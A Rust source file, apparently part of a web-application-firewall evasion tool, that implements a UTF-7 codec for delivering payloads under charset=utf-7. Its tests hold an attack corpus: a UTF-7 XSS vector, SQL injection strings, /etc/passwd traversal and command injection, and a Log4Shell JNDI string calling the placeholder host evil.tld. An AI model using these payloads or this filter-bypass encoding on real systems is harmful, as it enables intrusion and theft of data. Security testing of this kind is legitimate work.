wafrift_types/
utf7.rs

1//! UTF-7 (RFC 2152) codec — a foundational, self-contained primitive.
2//!
3//! Lives here in `wafrift-types` (alongside [`crate::hash`]) rather than in
4//! `wafrift-encoding` so BOTH `wafrift-encoding` (as an encoding strategy)
5//! and `wafrift-grammar` (for the `charset=utf-7` delivery shape) can reuse
6//! ONE source of truth without `grammar` having to depend on the heavy
7//! `encoding` crate (which pulls native `brotli`/`flate2`). `encoding`
8//! re-exports `utf7_encode`/`utf7_decode` for backward compatibility.
9//!
10//! The round-trip identity `utf7_decode(utf7_encode(s)) == Some(s)` is the
11//! soundness basis for delivering a payload under `charset=utf-7`: a
12//! UTF-7-honoring backend recovers the exact bytes the operator supplied.
13
14use base64::{Engine as _, engine::general_purpose};
15
16/// Encode a single Unicode scalar value to UTF-16 BE bytes.
17fn char_to_utf16be(c: char) -> Vec<u8> {
18    let mut buf = [0u16; 2];
19    let enc = c.encode_utf16(&mut buf);
20    let mut out = Vec::with_capacity(enc.len() * 2);
21    for u in enc {
22        out.push((*u >> 8) as u8);
23        out.push((*u & 0xFF) as u8);
24    }
25    out
26}
27
28/// Modified Base64 for UTF-7 (RFC 2152) — standard alphabet without padding.
29fn modified_base64(bytes: &[u8]) -> String {
30    let mut b64 = general_purpose::STANDARD.encode(bytes);
31    b64.retain(|c| c != '=');
32    b64
33}
34
35/// RFC 2152 direct characters.
36fn is_utf7_direct(ch: char) -> bool {
37    matches!(
38        ch,
39        'A'..='Z'
40            | 'a'..='z'
41            | '0'..='9'
42            | '\''
43            | '('
44            | ')'
45            | ','
46            | '-'
47            | '.'
48            | '/'
49            | ':'
50            | '?'
51    )
52}
53
54/// UTF-7 encoding per RFC 2152.
55///
56/// **Context**: `iis`, `legacy-dotnet` — only safe where the target actually
57/// decodes UTF-7.
58#[must_use]
59pub fn utf7_encode(payload: &str) -> String {
60    let mut out = String::new();
61    let mut shift_buf: Vec<u8> = Vec::new();
62
63    fn flush_shift(out: &mut String, buf: &mut Vec<u8>) {
64        if !buf.is_empty() {
65            out.push('+');
66            out.push_str(&modified_base64(buf));
67            out.push('-');
68            buf.clear();
69        }
70    }
71
72    for ch in payload.chars() {
73        if ch == '+' {
74            flush_shift(&mut out, &mut shift_buf);
75            out.push_str("+-");
76        } else if is_utf7_direct(ch) {
77            flush_shift(&mut out, &mut shift_buf);
78            out.push(ch);
79        } else {
80            shift_buf.extend_from_slice(&char_to_utf16be(ch));
81        }
82    }
83    flush_shift(&mut out, &mut shift_buf);
84    out
85}
86
87/// True for a byte in the modified-Base64 alphabet (RFC 2152: the standard
88/// `A-Za-z0-9+/` set, no padding). `-` is NOT in it, so it unambiguously
89/// terminates a shift sequence.
90fn is_modified_base64_byte(b: u8) -> bool {
91    b.is_ascii_alphanumeric() || b == b'+' || b == b'/'
92}
93
94/// UTF-8 lead-byte length, for passing direct (non-shifted) bytes through
95/// the UTF-7 decoder intact.
96fn utf8_lead_len(first: u8) -> usize {
97    match first {
98        0x00..=0x7F => 1,
99        0xC0..=0xDF => 2,
100        0xE0..=0xEF => 3,
101        _ => 4,
102    }
103}
104
105/// Decode UTF-7 (RFC 2152) — the inverse of [`utf7_encode`], i.e. exactly
106/// what a UTF-7-honoring backend computes. `+` opens a shift sequence of
107/// modified-Base64 carrying UTF-16BE code units, terminated by `-` (absorbed)
108/// or any non-Base64 byte (kept); `+-` is a literal `+`; every other byte
109/// passes through. Returns `None` on malformed Base64, an odd UTF-16 byte
110/// count, or unpaired surrogates — so a caller proving round-trip soundness
111/// treats undecodable input as "not recoverable" rather than guess.
112#[must_use]
113pub fn utf7_decode(s: &str) -> Option<String> {
114    let b = s.as_bytes();
115    let mut out = String::new();
116    let mut i = 0;
117    while i < b.len() {
118        if b[i] == b'+' {
119            // `+-` → literal `+`.
120            if i + 1 < b.len() && b[i + 1] == b'-' {
121                out.push('+');
122                i += 2;
123                continue;
124            }
125            // Gather the modified-Base64 run.
126            let start = i + 1;
127            let mut j = start;
128            while j < b.len() && is_modified_base64_byte(b[j]) {
129                j += 1;
130            }
131            let mut chunk = s[start..j].to_string();
132            while !chunk.len().is_multiple_of(4) {
133                chunk.push('='); // re-pad for the standard decoder
134            }
135            let raw = general_purpose::STANDARD.decode(chunk.as_bytes()).ok()?;
136            if raw.len() % 2 != 0 {
137                return None; // UTF-16BE is 2 bytes per code unit
138            }
139            let units: Vec<u16> = raw
140                .chunks_exact(2)
141                .map(|c| (u16::from(c[0]) << 8) | u16::from(c[1]))
142                .collect();
143            out.push_str(&String::from_utf16(&units).ok()?);
144            i = j;
145            if i < b.len() && b[i] == b'-' {
146                i += 1; // absorb the explicit terminator
147            }
148        } else {
149            let len = utf8_lead_len(b[i]);
150            if i + len > b.len() {
151                return None;
152            }
153            out.push_str(s.get(i..i + len)?);
154            i += len;
155        }
156    }
157    Some(out)
158}
159
160#[cfg(test)]
161mod tests {
162    use super::{utf7_decode, utf7_encode};
163
164    #[test]
165    fn utf7_basic_encode() {
166        assert_eq!(utf7_encode("Hello"), "Hello"); // direct chars pass through
167        assert_eq!(utf7_encode("A+B"), "A+-B"); // `+` escaped
168        assert!(utf7_encode("日本語").starts_with('+')); // non-ASCII shifted
169    }
170
171    #[test]
172    fn utf7_decode_matches_canonical_vectors() {
173        // The well-known UTF-7 XSS vector and the literal-plus escape.
174        assert_eq!(utf7_decode("+ADw-script+AD4-").as_deref(), Some("<script>"));
175        assert_eq!(utf7_decode("+-").as_deref(), Some("+"));
176        assert_eq!(utf7_decode("hello").as_deref(), Some("hello"));
177        // And the encoder produces exactly that canonical vector.
178        assert_eq!(utf7_encode("<script>"), "+ADw-script+AD4-");
179    }
180
181    #[test]
182    fn utf7_round_trips_attack_corpus_and_unicode() {
183        // SOUNDNESS basis for a charset=utf-7 delivery: a UTF-7 backend
184        // (utf7_decode) recovers the EXACT operator payload for every member.
185        let corpus = [
186            "<script>alert(document.cookie)</script>",
187            "' OR '1'='1' -- ",
188            "1 UNION SELECT password FROM users",
189            "../../../../etc/passwd",
190            "${jndi:ldap://evil.tld/a}",
191            "; cat /etc/passwd",
192            "plain ascii",
193            "+already+plus+",
194            "café ☕ 日本語 😀 surrogate-pair",
195            "",
196            "=",
197            "<>\"'&;|()[]{}",
198        ];
199        for p in corpus {
200            let enc = utf7_encode(p);
201            assert_eq!(
202                utf7_decode(&enc).as_deref(),
203                Some(p),
204                "UTF-7 round-trip lost bytes for {p:?} via {enc}"
205            );
206        }
207    }
208}
wafrift_types/utf7.rs

wafrift_types/
utf7.rs